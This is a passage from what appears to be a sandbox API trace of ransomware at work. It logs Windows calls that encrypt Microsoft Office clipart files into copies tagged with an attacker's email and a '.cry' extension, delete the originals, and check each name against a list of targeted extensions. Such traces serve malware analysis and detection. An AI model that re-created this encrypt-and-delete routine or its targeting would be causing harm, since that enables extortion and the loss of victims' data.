office\\clipart\\pub60cor\\ag00139_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.258] GetLastError () returned 0x0 [0051.258] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x296f, lpOverlapped=0x0) returned 1 [0051.264] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x2970, lpOverlapped=0x0) returned 1 [0051.264] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.264] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.265] SetEndOfFile (hFile=0x1c4) returned 1 [0051.265] CloseHandle (hObject=0x1c4) returned 1 [0051.265] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.265] SetEndOfFile (hFile=0x20c) returned 1 [0051.266] CloseHandle (hObject=0x20c) returned 1 [0051.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.266] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 1 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.266] lstrlenW (lpString=".doc") returned 4 [0051.266] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.266] lstrlenW (lpString=".docx") returned 5 [0051.266] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.266] lstrlenW (lpString=".pdf") returned 4 [0051.266] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.266] lstrlenW (lpString=".xls") returned 4 [0051.266] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.266] lstrlenW (lpString=".xlsx") returned 5 [0051.266] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.266] lstrlenW (lpString=".ppt") returned 4 [0051.266] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.266] lstrlenW (lpString=".zip") returned 4 [0051.266] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.266] lstrlenW (lpString=".rar") returned 4 [0051.266] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.266] lstrlenW (lpString=".bz2") returned 4 [0051.266] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.267] lstrlenW (lpString=".7z") returned 3 [0051.267] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString=".dbf") returned 4 [0051.267] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString=".1cd") returned 4 [0051.267] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString=".jpg") returned 4 [0051.267] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString=".doc") returned 4 [0051.267] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.267] lstrlenW (lpString=".docx") returned 5 [0051.267] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.267] lstrlenW (lpString=".pdf") returned 4 [0051.267] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.267] lstrlenW (lpString=".xls") returned 4 [0051.267] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.267] lstrlenW (lpString=".xlsx") returned 5 [0051.267] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.267] lstrlenW (lpString=".ppt") returned 4 [0051.267] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString=".zip") returned 4 [0051.267] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.267] lstrlenW (lpString=".rar") returned 4 [0051.267] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.267] lstrlenW (lpString=".bz2") returned 4 [0051.267] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.267] lstrlenW (lpString=".7z") returned 3 [0051.267] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.267] lstrlenW (lpString=".dbf") returned 4 [0051.267] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.268] lstrlenW (lpString=".1cd") returned 4 [0051.268] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63 [0051.268] lstrlenW (lpString=".jpg") returned 4 [0051.268] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.268] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0051.268] lstrlenW (lpString="AG00142_.GIF") returned 12 [0051.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.268] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=15308) returned 1 [0051.268] CloseHandle (hObject=0x20c) returned 1 [0051.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 0x20 [0051.268] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.268] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.268] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.269] GetLastError () returned 0x0 [0051.269] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x3bcc, lpOverlapped=0x0) returned 1 [0051.276] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x3bd0, lpOverlapped=0x0) returned 1 [0051.277] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.277] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.278] SetEndOfFile (hFile=0x1c4) returned 1 [0051.278] CloseHandle (hObject=0x1c4) returned 1 [0051.278] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.278] SetEndOfFile (hFile=0x20c) returned 1 [0051.279] CloseHandle (hObject=0x20c) returned 1 [0051.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.279] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 1 [0051.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.279] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.279] lstrlenW (lpString=".doc") returned 4 [0051.279] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.279] lstrlenW (lpString=".docx") returned 5 [0051.279] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.279] lstrlenW (lpString=".pdf") returned 4 [0051.279] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.279] lstrlenW (lpString=".xls") returned 4 [0051.279] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.279] lstrlenW (lpString=".xlsx") returned 5 [0051.279] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.279] lstrlenW (lpString=".ppt") returned 4 [0051.280] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString=".zip") returned 4 [0051.280] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString=".rar") returned 4 [0051.280] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString=".bz2") returned 4 [0051.280] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.280] lstrlenW (lpString=".7z") returned 3 [0051.280] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString=".dbf") returned 4 [0051.280] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString=".1cd") returned 4 [0051.280] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString=".jpg") returned 4 [0051.280] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString=".doc") returned 4 [0051.280] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.280] lstrlenW (lpString=".docx") returned 5 [0051.280] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.280] lstrlenW (lpString=".pdf") returned 4 [0051.280] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString=".xls") returned 4 [0051.280] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString=".xlsx") returned 5 [0051.280] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.280] lstrlenW (lpString=".ppt") returned 4 [0051.280] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.280] lstrlenW (lpString=".zip") returned 4 [0051.280] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.280] lstrlenW (lpString=".rar") returned 4 [0051.281] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.281] lstrlenW (lpString=".bz2") returned 4 [0051.281] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.281] lstrlenW (lpString=".7z") returned 3 [0051.281] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.281] lstrlenW (lpString=".dbf") returned 4 [0051.281] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.281] lstrlenW (lpString=".1cd") returned 4 [0051.281] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63 [0051.281] lstrlenW (lpString=".jpg") returned 4 [0051.281] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.281] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=4955) returned 1 [0051.281] CloseHandle (hObject=0x20c) returned 1 [0051.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 0x20 [0051.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.282] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.282] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.282] GetLastError () returned 0x0 [0051.282] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x135b, lpOverlapped=0x0) returned 1 [0051.333] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1360, lpOverlapped=0x0) returned 1 [0051.334] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.334] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.334] SetEndOfFile (hFile=0x1c4) returned 1 [0051.334] CloseHandle (hObject=0x1c4) returned 1 [0051.335] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.335] SetEndOfFile (hFile=0x20c) returned 1 [0051.335] CloseHandle (hObject=0x20c) returned 1 [0051.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.336] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0051.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0051.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0051.336] lstrlenW (lpString=".doc") returned 4 [0051.336] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.336] lstrlenW (lpString=".docx") returned 5 [0051.336] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.336] lstrlenW (lpString=".pdf") returned 4 [0051.336] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.336] lstrlenW (lpString=".xls") returned 4 [0051.336] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.336] lstrlenW (lpString=".xlsx") returned 5 [0051.336] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.336] lstrlenW (lpString=".ppt") returned 4 [0051.336] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0051.336] lstrlenW (lpString=".zip") returned 4 [0051.336] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.336] lstrlenW (lpString=".rar") returned 4 [0051.336] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.336] lstrlenW (lpString=".bz2") returned 4 [0051.336] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.336] lstrlenW (lpString=".7z") returned 3 [0051.336] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0051.336] lstrlenW (lpString=".dbf") returned 4 [0051.336] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0051.336] lstrlenW (lpString=".1cd") returned 4 [0051.337] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0051.337] lstrlenW (lpString=".jpg") returned 4 [0051.337] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.337] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1146) returned 1 [0051.337] CloseHandle (hObject=0x20c) returned 1 [0051.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 0x20 [0051.337] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.337] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.337] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0051.338] GetLastError () returned 0x0 [0051.338] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x47a, lpOverlapped=0x0) returned 1 [0051.341] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x480, lpOverlapped=0x0) returned 1 [0051.342] ReadFile (in: hFile=0x20c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.342] WriteFile (in: hFile=0x1c4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.342] SetEndOfFile (hFile=0x1c4) returned 1 [0051.342] CloseHandle (hObject=0x1c4) returned 1 [0051.342] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.342] SetEndOfFile (hFile=0x20c) returned 1 [0051.343] CloseHandle (hObject=0x20c) returned 1 [0051.343] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.344] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 1 [0051.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0051.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0051.344] lstrlenW (lpString=".doc") returned 4 [0051.344] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.344] lstrlenW (lpString=".docx") returned 5 [0051.344] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.344] lstrlenW (lpString=".pdf") returned 4 [0051.344] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.344] lstrlenW (lpString=".xls") returned 4 [0051.344] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.344] lstrlenW (lpString=".xlsx") returned 5 [0051.344] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.344] lstrlenW (lpString=".ppt") returned 4 [0051.344] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0051.344] lstrlenW (lpString=".zip") returned 4 [0051.344] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.344] lstrlenW (lpString=".rar") returned 4 [0051.344] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.344] lstrlenW (lpString=".bz2") returned 4 [0051.344] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.344] lstrlenW (lpString=".7z") returned 3 [0051.344] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0051.345] lstrlenW (lpString=".dbf") returned 4 [0051.345] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63 [0051.345] 